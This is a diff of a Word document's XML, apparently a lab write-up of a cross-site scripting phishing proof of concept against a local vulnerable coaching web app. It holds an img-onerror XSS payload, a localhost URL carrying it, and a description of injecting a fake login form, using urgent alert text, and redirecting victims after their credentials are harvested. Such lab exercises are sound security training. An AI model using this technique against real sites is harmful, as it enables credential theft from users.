                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="353849266" name=""/>
+                        <pic:cNvPr id="121578359" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId21"/>
+                        <a:blip r:embed="rId25"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
-                        <a:xfrm>
+                        <a:xfrm flipH="0" flipV="0">
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6857999" cy="2503873"/>
+                          <a:ext cx="4615674" cy="943801"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1255,8 +2005,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i12" o:spid="_x0000_s12" type="#_x0000_t75" style="width:540.00pt;height:197.16pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId21" o:title=""/>
+              <v:shape id="_x0000_i15" o:spid="_x0000_s15" type="#_x0000_t75" style="width:363.44pt;height:74.32pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId25" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -1264,57 +2014,29 @@
         </mc:AlternateContent>
       </w:r>
       <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="1825765"/>
+                <wp:extent cx="4615675" cy="942805"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="14" name=""/>
+                <wp:docPr id="17" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -1322,20 +2044,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1066513496" name=""/>
+                        <pic:cNvPr id="547070491" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId22"/>
+                        <a:blip r:embed="rId26"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
-                        <a:xfrm>
+                        <a:xfrm flipH="0" flipV="0">
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="1825765"/>
+                          <a:ext cx="4615674" cy="942804"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1368,15 +2090,52 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i13" o:spid="_x0000_s13" type="#_x0000_t75" style="width:540.00pt;height:143.76pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId22" o:title=""/>
+              <v:shape id="_x0000_i16" o:spid="_x0000_s16" type="#_x0000_t75" style="width:363.44pt;height:74.24pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId26" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
       <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <w:t xml:space="preserve">I then tested out another payload and this did work.</w:t>
+      </w:r>
       <w:r/>
       <w:r/>
       <w:r/>
@@ -1387,40 +2146,127 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;img src=x style="display:none" onerror="alert('XSS on CoachwebApp')"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:hyperlink r:id="rId27" w:tooltip="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27XSS+on+CoachwebApp%27%29%22%3E" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+            <w:sz w:val="18"/>
+            <w:szCs w:val="18"/>
+            <w:highlight w:val="none"/>
+          </w:rPr>
+          <w:t xml:space="preserve">http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27XSS+on+CoachwebApp%27%29%22%3E</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+            <w:sz w:val="18"/>
+            <w:szCs w:val="18"/>
+            <w:highlight w:val="none"/>
+          </w:rPr>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="3007366"/>
+                <wp:extent cx="5074914" cy="1852865"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="15" name=""/>
+                <wp:docPr id="18" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -1428,20 +2274,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="4688042" name=""/>
+                        <pic:cNvPr id="353849266" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId23"/>
+                        <a:blip r:embed="rId28"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
-                        <a:xfrm>
+                        <a:xfrm flipH="0" flipV="0">
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="3007366"/>
+                          <a:ext cx="5074914" cy="1852864"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1474,8 +2320,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i14" o:spid="_x0000_s14" type="#_x0000_t75" style="width:540.00pt;height:236.80pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId23" o:title=""/>
+              <v:shape id="_x0000_i17" o:spid="_x0000_s17" type="#_x0000_t75" style="width:399.60pt;height:145.89pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId28" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -1484,15 +2330,6 @@
       </w:r>
       <w:r/>
       <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
       <w:r/>
       <w:r/>
     </w:p>
@@ -1504,7 +2341,25 @@
         <w:rPr/>
       </w:pPr>
       <w:r/>
+      <w:r>
+        <w:t xml:space="preserve">I then changed this message a little bit, copied the entire form and injected it. This worked too. Since this is a PoC phishing attack, to make things slightly more realistic, I updated the alert() message to “You need to log in immediately!” to give a sense of urgency.</w:t>
+      </w:r>
       <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
       <w:r/>
     </w:p>
     <w:p>
@@ -1512,29 +2367,10 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
       </w:pPr>
       <w:r/>
       <w:r/>
@@ -1543,9 +2379,9 @@
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2305373"/>
+                <wp:extent cx="5251698" cy="1398128"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="16" name=""/>
+                <wp:docPr id="19" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -1553,20 +2389,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1250256772" name=""/>
+                        <pic:cNvPr id="1602254135" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId24"/>
+                        <a:blip r:embed="rId29"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
-                        <a:xfrm>
+                        <a:xfrm flipH="0" flipV="0">
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6857999" cy="2305372"/>
+                          <a:ext cx="5251697" cy="1398128"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1599,8 +2435,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i15" o:spid="_x0000_s15" type="#_x0000_t75" style="width:540.00pt;height:181.53pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId24" o:title=""/>
+              <v:shape id="_x0000_i18" o:spid="_x0000_s18" type="#_x0000_t75" style="width:413.52pt;height:110.09pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId29" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -1609,14 +2445,12 @@
       </w:r>
       <w:r/>
       <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
       <w:r/>
       <w:r/>
       <w:r/>
@@ -1626,18 +2460,41 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
+        <w:jc w:val="center"/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:jc w:val="center"/>
+        <w:rPr/>
+      </w:pPr>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2011747"/>
+                <wp:extent cx="5187175" cy="2274677"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="17" name=""/>
+                <wp:docPr id="20" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -1645,20 +2502,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1425034196" name=""/>
+                        <pic:cNvPr id="1295823239" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId25"/>
+                        <a:blip r:embed="rId30"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
-                        <a:xfrm>
+                        <a:xfrm flipH="0" flipV="0">
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2011746"/>
+                          <a:ext cx="5187174" cy="2274676"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1691,8 +2548,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i16" o:spid="_x0000_s16" type="#_x0000_t75" style="width:540.00pt;height:158.41pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId25" o:title=""/>
+              <v:shape id="_x0000_i19" o:spid="_x0000_s19" type="#_x0000_t75" style="width:408.44pt;height:179.11pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId30" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -1711,6 +2568,15 @@
       </w:pPr>
       <w:r/>
       <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
       <w:r/>
     </w:p>
     <w:p>
@@ -1721,8 +2587,18 @@
         <w:rPr/>
       </w:pPr>
       <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">But it forwarded me to the form page. So, i will update the attacker service to redirect to google.com once the data has been harvested.</w:t>
+        <w:t xml:space="preserve">I then pressed OK to close the alert(), and then I entered a sample username and a password.</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -1733,16 +2609,15 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
       <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="1208552"/>
+                <wp:extent cx="5800701" cy="1949953"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="18" name=""/>
+                <wp:docPr id="21" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -1750,20 +2625,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="528378892" name=""/>
+                        <pic:cNvPr id="1819864269" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId26"/>
+                        <a:blip r:embed="rId31"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
-                        <a:xfrm>
+                        <a:xfrm flipH="0" flipV="0">
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="1208552"/>
+                          <a:ext cx="5800701" cy="1949953"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1796,8 +2671,220 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i17" o:spid="_x0000_s17" type="#_x0000_t75" style="width:540.00pt;height:95.16pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId26" o:title=""/>
+              <v:shape id="_x0000_i20" o:spid="_x0000_s20" type="#_x0000_t75" style="width:456.75pt;height:153.54pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId31" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="5800701" cy="1701595"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="22" name=""/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="1425034196" name=""/>
+                        <pic:cNvPicPr>
+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId32"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm flipH="0" flipV="0">
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5800701" cy="1701595"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i21" o:spid="_x0000_s21" type="#_x0000_t75" style="width:456.75pt;height:133.98pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId32" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">It was properly logged. However, after submitting the form, I was redirected to the attackers dashboard. Therefore, I updated the /validate route mapping in the attacker dashboard to redirect to google.com instead. In a real phishing attack, we would want to redirect them to the actual service’s page.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="6858000" cy="1208552"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="23" name=""/>
+                <wp:cNvGraphicFramePr>
